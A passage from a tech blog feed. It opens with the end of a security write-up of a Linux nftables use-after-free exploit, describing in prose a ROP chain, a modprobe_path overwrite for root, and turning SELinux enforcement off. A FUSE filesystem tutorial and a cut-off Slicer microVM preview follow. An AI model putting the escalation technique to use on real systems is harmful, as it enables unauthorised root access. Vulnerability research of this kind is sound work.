									&lt;p&gt;We use the same technique as before: use the UAF to place &lt;code&gt;table-&amp;gt;name&lt;/code&gt; at the old location of &lt;code&gt;nft_chain&lt;/code&gt;, then make the &lt;code&gt;rules-&amp;gt;next&lt;/code&gt; offset point to our &lt;code&gt;msg_msg-2k&lt;/code&gt; leak + 0x30 (this is where we control the data, since &lt;code&gt;msg_msg&lt;/code&gt; has metadata at the beginning of the structure). Then we replace our old &lt;code&gt;msg_msg&lt;/code&gt; with one containing all fake pointers at precise offsets to simulate the different structures, until we can start our ROP chain at the old &lt;code&gt;validate&lt;/code&gt; field. We are lucky because our first gadget is called with:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;code-line language-C&quot;&gt;expr-&amp;gt;ops-&amp;gt;validate(ctx, expr)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Here, &lt;code&gt;expr&lt;/code&gt; is a pointer to our fake &lt;code&gt;nft_expr&lt;/code&gt;, which we control. This makes it easier to stack pivot into &lt;code&gt;msg_msg-2k&lt;/code&gt;, since &lt;code&gt;RSI&lt;/code&gt; already points to an address in that region.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;As gadgets change between kernel builds, we will not go into detail on how to craft a ROP chain. We will just explain what we did and leave this exercise to the reader.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;In our ROP chain, after stack pivoting into &lt;code&gt;msg_msg-2k&lt;/code&gt;, we decided to modify &lt;code&gt;modprobe_path&lt;/code&gt; in order to obtain root privileges (see &lt;a href=&quot;https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch&quot;&gt;this article&lt;/a&gt;). After modifying it, we also had to disable &lt;code&gt;SELinux&lt;/code&gt;, as it would block the kernel from executing a file in &lt;code&gt;/tmp&lt;/code&gt; or &lt;code&gt;/home/user&lt;/code&gt; as &lt;code&gt;modprobe_path&lt;/code&gt;. To do so, there is a global structure called &lt;code&gt;selinux_state&lt;/code&gt; with an &lt;code&gt;enforcing&lt;/code&gt; field that we have to set to 0. After that, we did not want to return to userland because we had completely corrupted the kernel stack, so we decided to put the kernel to sleep using &lt;code&gt;msleep&lt;/code&gt;. This still allows us to trigger &lt;code&gt;modprobe_path&lt;/code&gt; from another process.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/kernel_sleep.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;After setting up all these structures, there is one last thing to do: trigger the call to &lt;code&gt;nft_chain_validate&lt;/code&gt;. To do so, you can create a base chain and add a rule that uses the map with the UAF as the filter.&lt;/p&gt;&lt;p&gt;This will call &lt;code&gt;nft_chain_validate&lt;/code&gt;, traverse all the fake structures, call the fake &lt;code&gt;validate&lt;/code&gt; pointer (now your ROP chain), and obtain a LPE!&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;&lt;b&gt;Alexis &amp;amp; Lyes&lt;/b&gt;&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;About Us&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;span&gt;
						&lt;/span&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Founded in 2021 and headquartered in Paris, &lt;strong&gt;FuzzingLabs&lt;/strong&gt; is a cybersecurity startup specializing in &lt;strong&gt;vulnerability research, fuzzing, and blockchain security&lt;/strong&gt;. We combine cutting-edge research with hands-on expertise to secure some of the most critical components in the blockchain ecosystem.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://fuzzinglabs.com/contact&quot;&gt;Contact us&lt;/a&gt; for an audit or long term partnership!&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Building a tiny FUSE filesystem</title>
<link>https://www.shayon.dev/post/2026/161/building-a-tiny-fuse-filesystem/</link>
<enclosure type="image/jpeg" length="0" url="https://www.shayon.dev/tiny-filesystem.jpg"></enclosure>
<guid isPermaLink="false">SCp0SPp3Cxq0gngoXG8ppaz3x1Cd0i0a5W4j7A==</guid>
<pubDate>Tue, 23 Jun 2026 13:56:14 +0000</pubDate>
<description>Building a small filesystem in Rust with metadata in JSON and file contents in plain local files, using FUSE to explore inodes, caching, and what it means for a write to become durable.</description>
<content:encoded>&lt;p&gt;Lately I have been working around sandboxing, storage, and networking, and a lot of that work keeps coming back to files, which makes sense since Unix has organized itself around &lt;a href=&quot;https://en.wikipedia.org/wiki/Everything_is_a_file&quot;&gt;everything is a file&lt;/a&gt; for over fifty years. Your terminal and random number generator are device files you can open and read (&lt;code&gt;/dev/tty&lt;/code&gt;, &lt;code&gt;/dev/urandom&lt;/code&gt;), and even network sockets, which are created with their own system call rather than opened by path, are read and written through the same interface afterwards.&lt;/p&gt;&lt;p&gt;For this post, I built a small filesystem with a real backing store, enough metadata to behave like a filesystem, and a few deliberate omissions so the code is still readable.&lt;/p&gt;&lt;p&gt;&lt;code&gt;magicfs&lt;/code&gt; mounts at &lt;code&gt;/magic&lt;/code&gt;, but it keeps its own local backing store next to it, with names and inode numbers in &lt;code&gt;metadata.json&lt;/code&gt;, while file contents live as plain local files under &lt;code&gt;blobs/&lt;/code&gt;. Calling that directory a blob store is a little grandiose, because the blobs are just files with allocated names like &lt;code&gt;blob-000000000001&lt;/code&gt;, but keeping metadata separate from file contents lets the example cover name lookup, inode stability, write ordering, kernel caching, and what &lt;code&gt;fsync()&lt;/code&gt; is asking the filesystem to do.&lt;/p&gt;&lt;p&gt;The full sample code is at &lt;a href=&quot;https://github.com/shayonj/magicfs&quot;&gt;github.com/shayonj/magicfs&lt;/a&gt;, and if you have Docker, you can run the filesystem with FUSE enabled.&lt;/p&gt;&lt;h2&gt;Try it first&lt;/h2&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;docker run -it --rm --device /dev/fuse --cap-add SYS_ADMIN shayonj/magicfs&lt;/code&gt;&lt;/pre&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;$ ls /magic
hello.txt  notes.txt

$ cat /magic/hello.txt
Hello from a tiny FUSE filesystem.

$ echo &amp;quot;remember the milk&amp;quot; &amp;gt; /magic/notes.txt
$ cat /magic/notes.txt
remember the milk&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Inside that shell, the mount point is the interface applications use, while the store directory is private state owned by the filesystem process, so the shell sees an ordinary directory even though the data behind it is a metadata file plus a couple of local blobs.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;$ find /tmp/magicfs-store -type f
/tmp/magicfs-store/metadata.json
/tmp/magicfs-store/blobs/blob-000000000001
/tmp/magicfs-store/blobs/blob-000000000002&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the store directory, the metadata file stands in for a tiny inode table and a tiny directory tree, recording the name, inode number, size, mode bits, and blob IDs for each file.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;next_inode&amp;quot;: 4,
  &amp;quot;entries&amp;quot;: {
    &amp;quot;hello.txt&amp;quot;: {
      &amp;quot;ino&amp;quot;: 2,
      &amp;quot;mode&amp;quot;: 420,
      &amp;quot;size&amp;quot;: 36,
      &amp;quot;blobs&amp;quot;: [
        {
          &amp;quot;blob&amp;quot;: &amp;quot;blob-000000000001&amp;quot;,
          &amp;quot;offset&amp;quot;: 0,
          &amp;quot;len&amp;quot;: 36
        }
      ]
    },
    &amp;quot;notes.txt&amp;quot;: {
      &amp;quot;ino&amp;quot;: 3,
      &amp;quot;mode&amp;quot;: 420,
      &amp;quot;size&amp;quot;: 18,
      &amp;quot;blobs&amp;quot;: [
        {
          &amp;quot;blob&amp;quot;: &amp;quot;blob-000000000002&amp;quot;,
          &amp;quot;offset&amp;quot;: 0,
          &amp;quot;len&amp;quot;: 18
        }
      ]
    }
  }
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The path &lt;code&gt;notes.txt&lt;/code&gt; is not where the bytes live, it is the name that gets you to inode 3, and the metadata for inode 3 points at a blob file under &lt;code&gt;blobs/&lt;/code&gt;, so renaming &lt;code&gt;notes.txt&lt;/code&gt; changes the directory metadata, while rewriting it creates a new blob and updates the metadata pointer.&lt;/p&gt;&lt;h2&gt;Filesystems as a request loop&lt;/h2&gt;&lt;p&gt;When you run &lt;code&gt;cat /magic/hello.txt&lt;/code&gt;, &lt;code&gt;cat&lt;/code&gt; does not know that JSON metadata and blob files are involved, because all it does is call &lt;code&gt;open()&lt;/code&gt; and &lt;code&gt;read()&lt;/code&gt;, after which the kernel resolves the path through the &lt;a href=&quot;https://www.kernel.org/doc/html/latest/filesystems/vfs.html&quot;&gt;VFS&lt;/a&gt;, and the operation eventually lands on the filesystem mounted at &lt;code&gt;/magic&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;With FUSE, the code that answers those filesystem requests runs in userspace, where the kernel driver sends request messages over &lt;code&gt;/dev/fuse&lt;/code&gt;, the userspace process replies, and the application that made the system call keeps waiting until the kernel has an answer, while the &lt;a href=&quot;https://www.kernel.org/doc/html/latest/filesystems/fuse.html&quot;&gt;kernel FUSE documentation&lt;/a&gt; covers the protocol, and the &lt;a href=&quot;https://docs.rs/fuser&quot;&gt;&lt;code&gt;fuser&lt;/code&gt;&lt;/a&gt; crate exposes the same operations as Rust trait methods.&lt;/p&gt;&lt;p&gt;The path for a read looks roughly like this:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-mermaid&quot;&gt;flowchart LR
    A[&amp;quot;cat /magic/hello.txt&amp;quot;] --&amp;gt; B[&amp;quot;Linux VFS&amp;quot;]
    B --&amp;gt; C[&amp;quot;FUSE kernel driver&amp;quot;]
    C --&amp;gt; D[&amp;quot;magicfs userspace process&amp;quot;]
    D --&amp;gt; E[&amp;quot;metadata.json + local blobs&amp;quot;]
    E --&amp;gt; D
    D --&amp;gt; C
    C --&amp;gt; B
    B --&amp;gt; A&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the request log, &lt;code&gt;LOOKUP&lt;/code&gt; asks whether a name exists in a directory and which inode it maps to, &lt;code&gt;GETATTR&lt;/code&gt; asks for the metadata associated with an inode, &lt;code&gt;READ&lt;/code&gt; asks for bytes at an offset, and &lt;code&gt;WRITE&lt;/code&gt; sends bytes at an offset, while later in the lifetime of an open file, &lt;code&gt;FLUSH&lt;/code&gt;, &lt;code&gt;FSYNC&lt;/code&gt;, and &lt;code&gt;RELEASE&lt;/code&gt; show up and make the write path less like a simple callback that copies bytes.&lt;/p&gt;&lt;p&gt;Here is the log from writing &lt;code&gt;notes.txt&lt;/code&gt;, trimmed to the requests involved in opening, truncating, writing, flushing, and releasing the file:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;[magicfs] READDIR ino=1
[magicfs] LOOKUP notes.txt -&amp;gt; ino=3
[magicfs] OPEN notes.txt ino=3 flags=0x8001
[magicfs] SETATTR ino=3 size=0 staged=true
[magicfs] WRITE notes.txt ino=3 offset=0 len=18 staged=true
[magicfs] FLUSH notes.txt ino=3
[magicfs] COMMIT notes.txt ino=3 size=18 blobs=1
[magicfs] COMMIT metadata entries=2
[magicfs] RELEASE notes.txt ino=3 flags=0x8001 flush=true&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In this log, &lt;code&gt;ls&lt;/code&gt; triggers &lt;code&gt;READDIR&lt;/code&gt;, while a direct &lt;code&gt;cat /magic/hello.txt&lt;/code&gt; can walk the path without listing the directory first. Shell redirection with &lt;code&gt;&amp;gt;&lt;/code&gt; opens the file for writing and truncation, so the kernel sends a size change before it sends the bytes, and the &lt;code&gt;WRITE&lt;/code&gt; handler only stages the new contents in memory, while the backing store does not change until the file is flushed or synced.&lt;/p&gt;&lt;h2&gt;Metadata and names&lt;/h2&gt;&lt;p&gt;A filesystem usually has to answer a question about a name before it can answer anything about bytes, namely whether this name exists in this directory, and if it does, which file it refers to.&lt;/p&gt;&lt;p&gt;Linux mostly stops caring about filenames once path lookup is done, because internally it refers to files by inode number, and on a disk filesystem, an inode is a record with metadata and pointers to data blocks, while a directory entry maps a name to an inode, which is why a rename can change a path without moving file data, and also why hard links can make the same inode appear under more than one name.&lt;/p&gt;&lt;p&gt;&lt;code&gt;magicfs&lt;/code&gt; keeps the directory entry and inode metadata in &lt;code&gt;metadata.json&lt;/code&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;notes.txt&amp;quot;: {
  &amp;quot;ino&amp;quot;: 3,
  &amp;quot;mode&amp;quot;: 420,
  &amp;quot;size&amp;quot;: 18,
  &amp;quot;blobs&amp;quot;: [
    {
      &amp;quot;blob&amp;quot;: &amp;quot;blob-000000000002&amp;quot;,
      &amp;quot;offset&amp;quot;: 0,
      &amp;quot;len&amp;quot;: 18
    }
  ]
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The &lt;code&gt;LOOKUP notes.txt&lt;/code&gt; handler reads that map and returns inode 3, while the &lt;code&gt;GETATTR&lt;/code&gt; handler turns the entry into a &lt;code&gt;FileAttr&lt;/code&gt;, which is what makes &lt;code&gt;stat&lt;/code&gt; and &lt;code&gt;ls -l&lt;/code&gt; work, and the root directory uses inode 1, which is the conventional root inode for FUSE filesystems.&lt;/p&gt;&lt;p&gt;The ordering problem shows up before the read and write handlers do anything with file contents, because if a new blob reaches the backing store but &lt;code&gt;metadata.json&lt;/code&gt; still points at the old blob, readers keep seeing the old file, while if &lt;code&gt;metadata.json&lt;/code&gt; points at a blob that never made it to disk, readers see a broken file. &lt;code&gt;magicfs&lt;/code&gt; handles the simple case by writing the blob first, then replacing metadata, and the metadata replacement follows the usual local-filesystem pattern where the code writes a temporary file, syncs it, renames it over &lt;code&gt;metadata.json&lt;/code&gt;, and then syncs the containing directory.&lt;/p&gt;&lt;p&gt;The temp-file-and-rename pattern avoids half-written JSON, but it is not a journal, and without a recovery pass or a transaction log, the filesystem cannot determine after a crash whether every in-flight metadata update had committed.&lt;/p&gt;&lt;h2&gt;File contents as local blobs&lt;/h2&gt;&lt;p&gt;For the data path, &lt;code&gt;magicfs&lt;/code&gt; stores each committed file version as one immutable blob with an allocated ID, while a more complete filesystem would split larger files into chunks and let metadata point at a list of chunks, but one blob per file keeps the code short.&lt;/p&gt;&lt;p&gt;For reads, metadata comes first, so given inode 3, the filesystem finds the entry for &lt;code&gt;notes.txt&lt;/code&gt;, reads the blob ID from that entry, opens the corresponding file under &lt;code&gt;blobs/&lt;/code&gt;, and returns the byte range the kernel requested.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;inode 3
  -&amp;gt; metadata entry for notes.txt
  -&amp;gt; blob ID blob-000000000002
  -&amp;gt; blobs/blob-000000000002
  -&amp;gt; bytes returned to READ&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For writes, the data moves in the other direction, but &lt;code&gt;magicfs&lt;/code&gt; does not mutate the blob in place, because when the kernel sends &lt;code&gt;WRITE&lt;/code&gt;, the filesystem stages the new file contents in memory, and later, when &lt;code&gt;FLUSH&lt;/code&gt; or &lt;code&gt;FSYNC&lt;/code&gt; arrives, it writes a new blob and updates metadata to point at it.&lt;/p&gt;&lt;p&gt;The example ends up with a small copy-on-write data path, although rewriting one byte of a large file should not require rewriting the whole file, so a more complete implementation would chunk the file, track dirty chunks, write only the changed chunks, and then commit a metadata update that points at the new chunk list, while &lt;code&gt;magicfs&lt;/code&gt; skips that complexity by assuming the files are small enough to rewrite as a unit.&lt;/p&gt;&lt;h2&gt;Write is not sync&lt;/h2&gt;&lt;p&gt;A shell command like this looks simpler than the filesystem work behind it:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;$ echo &amp;quot;remember the milk&amp;quot; &amp;gt; /magic/notes.txt&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Inside &lt;code&gt;magicfs&lt;/code&gt;, the work is closer to this:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;OPEN notes.txt for writing
SETATTR notes.txt size=0
WRITE bytes at offset 0
FLUSH because a file descriptor is closing
write content blob
replace metadata.json
RELEASE the open file&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;On a normal Linux filesystem, &lt;code&gt;write(2)&lt;/code&gt; usually means the kernel accepted the bytes into memory, not that the bytes necessarily reached stable storage. &lt;a href=&quot;https://man7.org/linux/man-pages/man2/fsync.2.html&quot;&gt;&lt;code&gt;fsync(2)&lt;/code&gt;&lt;/a&gt; is the call an application uses when it wants the file data, along with the metadata needed to retrieve that data, flushed to the storage device, while &lt;code&gt;fdatasync(2)&lt;/code&gt; is similar but can skip metadata that is not needed for a later read.&lt;/p&gt;&lt;p&gt;FUSE also calls the filesystem when a file descriptor closes, because &lt;code&gt;flush&lt;/code&gt; is called on close, and duplicated file descriptors mean one open file can have more than one flush. A filesystem can use &lt;code&gt;flush&lt;/code&gt; to report delayed write errors, but &lt;code&gt;flush&lt;/code&gt; does not mean the same thing as &lt;code&gt;fsync&lt;/code&gt;, and &lt;code&gt;release&lt;/code&gt; happens later still, when the kernel is done with the open file handle.&lt;/p&gt;&lt;p&gt;For the shell demo, &lt;code&gt;magicfs&lt;/code&gt; commits staged bytes on both &lt;code&gt;FLUSH&lt;/code&gt; and &lt;code&gt;FSYNC&lt;/code&gt;, which makes &lt;code&gt;echo hello &amp;gt; /magic/notes.txt&lt;/code&gt; behave the way a person expects, while the code still treats &lt;code&gt;fsync&lt;/code&gt; as the explicit request for durable file data and metadata. A database that calls &lt;code&gt;fsync&lt;/code&gt; is asking a more specific question than a shell that happened to close a redirected file, and if the backing blob write fails after &lt;code&gt;WRITE&lt;/code&gt; already returned success, the filesystem still has to decide where that error can be reported, either through a later &lt;code&gt;fsync&lt;/code&gt; or through a close-time error from &lt;code&gt;flush&lt;/code&gt;, although plenty of programs are not careful about checking close errors.&lt;/p&gt;&lt;p&gt;For metadata, replacing a file with &lt;code&gt;rename&lt;/code&gt; is atomic for readers, but atomic replacement is not the same thing as durability after power loss, so if you care that the new &lt;code&gt;metadata.json&lt;/code&gt; survives a crash, you need to sync the new file contents and the directory entry that points at it, which &lt;code&gt;magicfs&lt;/code&gt; handles for its local store by syncing the temporary metadata file before rename, then syncing the store directory after rename.&lt;/p&gt;&lt;p&gt;In code, those rules show up in the order of blob writes, metadata replacement, &lt;code&gt;flush&lt;/code&gt;, and &lt;code&gt;fsync&lt;/code&gt;, because the filesystem has to decide which bytes exist, which names point at them, and what an application is allowed to assume after a successful sync.&lt;/p&gt;&lt;h2&gt;Caching and stale metadata&lt;/h2&gt;&lt;p&gt;FUSE replies can include time-to-live values for names and attributes, and until those TTLs expire, the kernel can answer repeated lookups and &lt;code&gt;getattr&lt;/code&gt; calls without asking the userspace process again, which matters because crossing from the kernel into a userspace filesystem on every &lt;code&gt;stat&lt;/code&gt; would be expensive.&lt;/p&gt;&lt;p&gt;The same TTL also affects correctness, because &lt;code&gt;magicfs&lt;/code&gt; uses a one second TTL, which is fine for a single-process demo, but if another process or another machine can update the same backing store, a reader may see an old file size or an old blob ID until the cache expires unless the filesystem actively invalidates the kernel’s cached state.&lt;/p&gt;&lt;p&gt;For file contents, &lt;code&gt;magicfs&lt;/code&gt; opens files with FUSE direct I/O so reads come back to the userspace filesystem instead of being served from the page cache, which keeps the example easier to reason about but gives up caching and read-ahead that a real filesystem would probably want, and the cache policy matters because it changes which file size, inode attributes, and file contents callers are able to observe.&lt;/p&gt;&lt;h2&gt;Shortcomings I kept&lt;/h2&gt;&lt;p&gt;The implementation only supports one directory, and each file is stored as one local blob, so rewriting a byte rewrites the whole file, with no journal, recovery scan, or cleanup for orphaned blobs left behind by rewrites or unlinks, and it also does not implement locking, &lt;code&gt;mmap&lt;/code&gt;, extended attributes, a real permission model, sparse files, hard links, symlinks, or multi-client cache invalidation.&lt;/p&gt;&lt;p&gt;The filesystem also does not model the problems that show up when the backing layer is remote, since network failures, remote consistency rules, retries, and authentication all change when reads can succeed, when writes can be retried, and what &lt;code&gt;fsync&lt;/code&gt; can honestly report, while this example stays on local disk so the post can focus on filesystem calls.&lt;/p&gt;&lt;p&gt;A journal or transaction log would let recovery decide whether a metadata update committed, chunking would avoid rewriting whole files, a garbage collector would find blobs no metadata entry can reach, and better cache invalidation would keep multiple readers from seeing stale metadata for too long.&lt;/p&gt;&lt;p&gt;With FUSE, Linux asks the filesystem a fixed collection of questions, and the implementation can answer from whatever backing store it owns, which means the implementation still has to define &lt;code&gt;lookup&lt;/code&gt;, &lt;code&gt;write&lt;/code&gt;, &lt;code&gt;flush&lt;/code&gt;, &lt;code&gt;fsync&lt;/code&gt;, and &lt;code&gt;rename&lt;/code&gt; when metadata and file contents are stored somewhere else.&lt;/p&gt;&lt;p&gt;I am working on these filesystem, sandboxing, and storage problems at Tines, along with plenty of adjacent systems work that gets deeper than a blog post can. If that sounds interesting, &lt;a href=&quot;https://www.tines.com/careers/jobs/6014045004/&quot;&gt;we are hiring&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Preview: Slice Up Bare-Metal with Slicer</title>
<link>https://blog.alexellis.io/slicer-bare-metal-preview/</link>
<guid isPermaLink="false">xtaIk-ji1W1OmxxuABjZeI1KXRUfB-_eU9swBw==</guid>
<pubDate>Tue, 23 Jun 2026 06:43:04 +0000</pubDate>
<description>The easiest and best supported way to learn and deploy Firecracker and microVMs.</description>
<content:encoded>&lt;p&gt;By popular request, we&amp;#39;re releasing Slicer, our much used internal tool from OpenFaaS Ltd for efficiently slicing up bare metal into microVMs.&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;Since this blog post, there&amp;#39;s &lt;a href=&quot;https://docs.slicervm.com&quot;&gt;official documentation&lt;/a&gt; with use-cases and examples, and a &lt;a href=&quot;https://slicervm.com&quot;&gt;landing page&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;&lt;p&gt;I was on a call this week with Lingzhi Wang, of &lt;a href=&quot;https://www.northwestern.edu/&quot;&gt;Northwestern University&lt;/a&gt; in the USA. He told me he was doing a research project on intrusion detection with &lt;a href=&quot;https://openfaas.com&quot;&gt;OpenFaaS&lt;/a&gt;, and had access to a powerful machine.&lt;/p&gt;&lt;p&gt;When I asked how powerful the machine was, his reply shocked me:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;128 Cores&lt;/li&gt;
&lt;li&gt;1.5 TB of RAM&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;My next question surprised him.&lt;/p&gt;&lt;p&gt;How many Kubernetes Pods, do you think you can run on that huge machine?&lt;/p&gt;&lt;p&gt;I answered: only 100. &lt;code&gt;[1]&lt;/code&gt;&lt;/p&gt;&lt;p&gt;He was installing &lt;a href=&quot;https://k3s.io&quot;&gt;K3s&lt;/a&gt; (&lt;a href=&quot;https://kubernetes.io/&quot;&gt;Kubernetes&lt;/a&gt;) directly onto the host, which when coupled with a 100 Pod limit is a huge waste of resources.&lt;/p&gt;&lt;p&gt;Enter slicer, and the original reason we created it.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;If you&amp;#39;ve not seen a demo of my slicer tool yet..&lt;br/&gt;&lt;br/&gt;It takes a bare-metal host and partitions it into dozens of Firecracker VMs in ~ 1-2s. From there you can do whatever you want via SSH&lt;br/&gt;&lt;br/&gt;In my screenshot &amp;quot;k3sup plan&amp;quot; created a 25-node HA cluster&lt;a href=&quot;https://t.co/WpG2v3RPK7&quot;&gt;https://t.co/WpG2v3RPK7&lt;/a&gt; &lt;a href=&quot;https://t.co/Wbz5Szk1BI&quot;&gt;pic.twitter.com/Wbz5Szk1BI&lt;/a&gt;&lt;/p&gt;— Alex Ellis (@alexellisuk) &lt;a href=&quot;https://twitter.com/alexellisuk/status/1716759592795885976?ref_src=twsrc%5Etfw&quot;&gt;October 24, 2023&lt;/a&gt;&lt;/blockquote&gt;&lt;p&gt;The original use-case was for customer support for our line of Kubernetes products such as OpenFaaS and Inlets Uplink.&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;Build a large cluster capable of running thousands of Pods on a single machine - blasting that 100 Pod per node limit&lt;/li&gt;
&lt;li&gt;Learn how far we can push OpenFaaS before we start to see untolerable latency on &lt;code&gt;faas-cli list&lt;/code&gt; and &lt;code&gt;faas-cli deploy&lt;/code&gt;, etc&lt;/li&gt;
&lt;li&gt;Optimise the cost of long-running burn-in tests and customer simulations&lt;/li&gt;
&lt;li&gt;Simulate spot-instance behaviour - node addition/removal through &lt;a href=&quot;https://firecracker-microvm.github.io&quot;&gt;Firecracker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Chaos testing - what happens when the network disconnects? This was used to fix a mysterious production issue for a customer where informers were disconnecting after network interruptions&lt;/li&gt;
&lt;li&gt;Test our code on Arm and x86_64 hosts&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Key features that make it ideal for running production workloads:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;Fast storage pool for instant clone of new VMs&lt;/li&gt;
&lt;li&gt;Run with a disk file for persistent workloads&lt;/li&gt;
&lt;li&gt;Boot time ~ 1s including systemd&lt;/li&gt;
&lt;li&gt;Proven at scale in &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt; running millions of jobs for top-tier CNCF projects&lt;/li&gt;
&lt;li&gt;Serial Over SSH console to enable access when the network is down&lt;/li&gt;
&lt;li&gt;Disk management utilities for migration&lt;/li&gt;
&lt;li&gt;Multi-host support for even larger slicer deployments&lt;/li&gt;
&lt;li&gt;Near-instant destruction of hosts&lt;/li&gt;
&lt;li&gt;GPU mounting via VFIO for Ollama&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;What about for individuals and hobbyists?&lt;/p&gt;&lt;p&gt;Slicer is probably the easiest, and best supported tool for working with &lt;a href=&quot;https://firecracker-microvm.github.io/&quot;&gt;Firecracker&lt;/a&gt; and microVMs.&lt;/p&gt;&lt;p&gt;The OS images and Kernels have been specially tuned for container workloads whilst working with various CNCF projects building actuated - our managed GitHub Actions offering. The documentation site gets you from zero to Firecracker Kubernetes cluster within single digit minutes.&lt;/p&gt;&lt;p&gt;So you get to have fun with your lab again, an excuse to buy an &lt;a href=&quot;https://blog.alexellis.io/n100-mini-computer/&quot;&gt;N100&lt;/a&gt; or Beelink - a way to to experiment and learn in an isolated environment.&lt;/p&gt;&lt;h2&gt;What is a preview?&lt;/h2&gt;&lt;p&gt;Slicer is already suitable for productive R&amp;amp;D/support uses and long-running production workloads.&lt;/p&gt;&lt;p&gt;So why is this being called a preview? It&amp;#39;s an internal tool, which we have been using since ~ 2022 along with actuated.&lt;/p&gt;&lt;p&gt;The preview is referring to making it consumable and useful as a public offering.&lt;/p&gt;&lt;h2&gt;Enough talking, I just want to see it running&lt;/h2&gt;&lt;p&gt;You can watch a brief demo here:&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;The demo features the Serial Over SSH (SOS) console which is great for chaos testing and debugging tricky issues without relying on networking.&lt;/p&gt;
&lt;/blockquote&gt;&lt;h2&gt;Stacking value - autoscaling Kubernetes - on your own hardware&lt;/h2&gt;&lt;p&gt;With the original versions of Slicer, we were already able to stand up a HA K3s cluster within about a minute, but with the new version, we can autoscale nodes through the upstream Kubernetes Cluster Autoscaler project.&lt;/p&gt;&lt;p&gt;This is the pinnacle of cool for me, but it has a real purpose - OpenFaaS customers run on spot instances, and autoscaling groups. Typically you just can&amp;#39;t reproduce that on your own kit.&lt;/p&gt;&lt;p&gt;I&amp;#39;ll be putting up our fork of the Cluster Autoscaler project on GitHub soon.&lt;/p&gt;&lt;h3&gt;K3sup Pro if you need K3s&lt;/h3&gt;&lt;p&gt;Whilst the &lt;a href=&quot;https://k3sup.dev&quot;&gt;K3sup&lt;/a&gt; CE edition with its &lt;code&gt;k3sup install/join&lt;/code&gt; commands is ideal for experimentation, K3sup Pro was built to satisfy long standing requests for an IaaC/GitOps experience.&lt;/p&gt;&lt;p&gt;K3sup Pro adds a Terraform-like &lt;code&gt;plan&lt;/code&gt; and &lt;code&gt;apply&lt;/code&gt; command to automate installations both small and large - running in parallel.&lt;/p&gt;&lt;p&gt;What&amp;#39;s more the plan command accepts the output from Slicer&amp;#39;s API, so you can run &lt;code&gt;slicer up&lt;/code&gt; then &lt;code&gt;k3sup plan/apply&lt;/code&gt; and you have a kubeconfig for a HA K3s cluster, within a minute or two.&lt;/p&gt;&lt;p&gt;The plan file can be customised and retained in Git for maintenance and updates.&lt;/p&gt;&lt;p&gt;K3sup Pro is a huge time saver, and free for my GitHub Sponsors.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://github.com/alexellis/k3sup?tab=readme-ov-file#k3sup-pro&quot;&gt;Learn more about K3sup Pro&lt;/a&gt;&lt;/p&gt;&lt;h2&gt;Everything you get for the price of a coffee&lt;/h2&gt;&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Oh, I expected it to be free.&amp;quot;&lt;/p&gt;
